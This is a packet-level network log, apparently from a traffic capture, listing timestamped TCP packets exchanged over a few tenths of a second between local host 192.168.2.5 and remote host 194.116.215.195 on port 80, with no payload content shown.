Sep 27, 2024 04:21:07.249216080 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249228954 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249242067 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249262094 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249269962 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249274969 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249285936 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249295950 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249316931 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249320030 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249340057 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249355078 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249378920 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249392033 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249403954 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249413013 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249433994 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249433994 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249454021 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249475956 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249488115 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249517918 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249531984 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249608040 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249619961 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249630928 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249640942 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249650002 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249655008 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249661922 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249670029 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249680996 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249692917 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249694109 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249705076 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249739885 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249771118 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249783993 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249794960 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249805927 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249815941 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249816895 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249828100 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249844074 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249874115 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249908924 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249921083 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249932051 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249954939 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249973059 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249977112 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249988079 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249999046 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250010967 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250021935 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250021935 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.250047922 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.250082016 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.250103951 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250144958 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.250209093 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250221968 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250232935 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250243902 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250255108 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250255108 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.250267982 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250274897 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.250281096 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250296116 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250307083 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.250324011 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.250350952 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.250497103 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250509024 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250519991 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250530958 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250543118 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.250544071 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250557899 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250564098 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.250596046 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.250610113 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.250629902 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250642061 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250652075 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250663042 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250674009 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250678062 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.250682116 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250698090 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.250729084 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.250905037 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250916958 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250927925 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250940084 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250951052 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250950098 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.250962973 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250974894 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.250976086 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.250984907 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.251003981 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.251008034 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.251017094 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.251024961 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.251029968 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.251044035 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.251054049 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.251085997 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.251133919 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.251146078 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.251157999 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.251169920 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.251183033 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.251213074 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.293071985 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.293087959 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.293107033 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.293118954 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.293129921 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.293140888 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.293145895 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.293152094 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.293164015 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.293207884 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.293229103 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.338781118 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.338804007 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.338816881 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.338828087 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.338840961 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.338855982 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.338891029 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.338920116 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.338932991 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.338943958 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.338957071 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.338968039 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.338969946 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.338995934 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339003086 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339030027 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339046001 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339065075 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339075089 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339078903 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339107037 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339118958 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339148045 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339159012 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339170933 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339199066 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339199066 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339216948 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339221001 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339234114 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339246035 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339260101 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339272022 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339282990 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339293003 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339294910 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339320898 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339323997 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339330912 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339337111 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339360952 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339374065 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339433908 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339446068 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339456081 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339478016 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339483023 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339493990 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339495897 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339521885 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339546919 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339556932 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339569092 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339581013 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339598894 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339622021 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339622021 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339657068 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339669943 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339679956 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339690924 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339701891 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339705944 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339713097 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339720964 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339730978 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339731932 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339756966 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339776039 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339788914 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339808941 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339821100 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339843988 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339870930 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339895964 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339907885 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339917898 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.339931011 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339945078 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339963913 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.339999914 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340010881 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340022087 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340033054 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340037107 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340049028 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340049982 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340061903 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340064049 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340074062 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340085983 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340095997 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340122938 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340214968 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340230942 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340243101 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340253115 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340260983 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340265989 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340270996 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340279102 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340290070 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340311050 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340372086 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340383053 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340395927 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340406895 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340420008 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340421915 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340431929 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340437889 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340445042 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340457916 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340459108 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340482950 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340507984 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340569019 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340579987 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340590954 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340620041 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340631008 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340637922 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340650082 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340662956 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340678930 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340704918 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340790987 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340801954 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340812922 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340825081 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340836048 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340837002 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340847969 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340859890 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340868950 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340902090 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.340939999 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340953112 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.340981007 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.341007948 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.341036081 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341048956 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341058969 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341070890 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341079950 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.341084957 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341097116 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341100931 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.341126919 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.341142893 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.341176987 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341187000 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341197968 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341208935 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341216087 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.341221094 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341233969 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341242075 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.341262102 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.341317892 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341329098 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341363907 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.341393948 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.341495991 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341509104 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341519117 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341530085 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341542006 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341542959 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.341555119 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341562986 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.341567993 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341579914 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341590881 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341592073 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.341605902 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341609955 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.341619015 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341628075 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.341630936 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341636896 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.341643095 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341655970 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.341677904 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.341701984 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.389645100 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.389661074 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.389672995 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.389708996 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.389720917 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.389730930 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.389731884 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.389745951 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.389761925 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.389785051 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.429471970 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.429488897 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.429501057 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.429512024 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.429531097 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.429553032 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.429555893 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.429574966 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.429586887 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.429589033 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.429600000 CEST	80	49713	194.116.215.195	192.168.2.5
